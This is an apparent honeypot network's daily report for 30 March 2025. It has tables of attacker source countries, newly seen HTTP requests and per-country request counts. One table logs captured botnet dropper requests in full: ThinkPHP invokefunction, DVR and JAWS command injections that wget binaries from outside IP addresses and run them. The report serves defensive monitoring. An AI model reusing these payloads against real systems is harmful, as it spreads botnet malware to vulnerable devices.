Daily Report: 2025-03-30#
Interaction report on http service of various honeypot around the world.
ot_simplified_report#
Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| US | Dubai |
| FR | |
| FR |
botnet_dropper_behaviour#
List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).
| remote_addr | request |
|---|---|
| 87.121.84.30 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7 HTTP/1.1 |
| 141.98.11.210 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7 HTTP/1.1 |
| 141.98.11.27 | GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\x5C/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1 |
| 124.8.182.136 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 101.69.248.251 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 123.240.58.26 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 36.27.91.147 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 61.130.11.82 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 1.172.23.42 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 58.58.30.134 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 61.231.225.60 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
request#
List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..
| number_of_occurence | request | |
|---|---|---|
| 183 | 4 | POST /player HTTP/1.1 |
| 304 | 1 | GET /odinhttpcall1743337271 HTTP/1.1 |
| 305 | 1 | GET /OdinHttpCall1743337271 HTTP/1.1 |
| 306 | 1 | GET /Odin/http/call1743337271 HTTP/1.1 |
| 324 | 1 | \x00\x0E8-\xD2\x8BsU\xA1I\x17\x00\x00\x00\x00\x00 |
| 333 | 1 | \x00\x0E\x08Hs\xA8\x9F)\x1A\x98 \x00\x00\x00\x00\x00 |
| 334 | 1 | \x00\x0E8Hs\xA8\x9F)\x1A\x98 \x00\x00\x00\x00\x00 |
| 357 | 1 | \x00\x0E8MG;i\x12\x90\x98\xDA\x00\x00\x00\x00\x00 |
| 362 | 1 | \x00\x0E8\x1Cz\x0B\x8C\xDA\x15\xF1\x9F\x00\x00\x00\x00\x00 |
| 385 | 1 | \x00\x0E8\xBDY\xC6\x8C\xC6* |
| 411 | 1 | \x00\x0E8\x80\xC9>\xE1V/_\xB1\x00\x00\x00\x00\x00 |
| 446 | 1 | \x00\x0E81\xC6C20e\xA3\xC9\x00\x00\x00\x00\x00 |
| 447 | 1 | GET /Authorization HTTP/1.1 |
| 482 | 1 | GET /odinhttpcall1743348762 HTTP/1.1 |
| 483 | 1 | GET /OdinHttpCall1743348762 HTTP/1.1 |
| 484 | 1 | GET /Odin/http/call1743348762 HTTP/1.1 |
| 485 | 1 | GET /socket.io/1/?t=1743323778311 HTTP/1.1 |
| 486 | 1 | GET /socket.io/1/?t=1743323991659 HTTP/1.1 |
| 495 | 1 | \x00\x0E8G\xDE\x93 |
country_iso_code#
List of country names and number of requests received by IPs located in these countries.
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 1015 | NL |
| 1 | 827 | BG |
| 2 | 410 | US |
| 3 | 180 | GB |
| 4 | 139 | DE |
| 5 | 120 | FR |
| 6 | 89 | SC |
| 7 | 84 | PL |
| 8 | 82 | HK |
| 9 | 48 | TW |
| 10 | 41 | LT |
| 11 | 38 | PT |
| 12 | 28 | CN |
| 13 | 28 | RU |
| 14 | 24 | CA |
| 15 | 20 | NG |
| 16 | 17 | CH |
| 17 | 17 | JP |
| 18 | 15 | KR |
| 19 | 13 | BR |
| 20 | 10 | UA |
| 21 | 9 | BE |
| 22 | 8 | NO |
| 23 | 7 | RO |
| 24 | 6 | IN |
| 25 | 6 | TR |
| 26 | 5 | IR |
| 27 | 5 | ZA |
| 28 | 3 | SG |
| 29 | 3 | VN |
| 30 | 3 | IT |
| 31 | 2 | AO |
| 32 | 2 | AZ |
| 33 | 1 | CL |
| 34 | 1 | TH |
| 35 | 1 | RS |
| 36 | 1 | PK |
| 37 | 1 | MY |
| 38 | 1 | CZ |
| 39 | 1 | AE |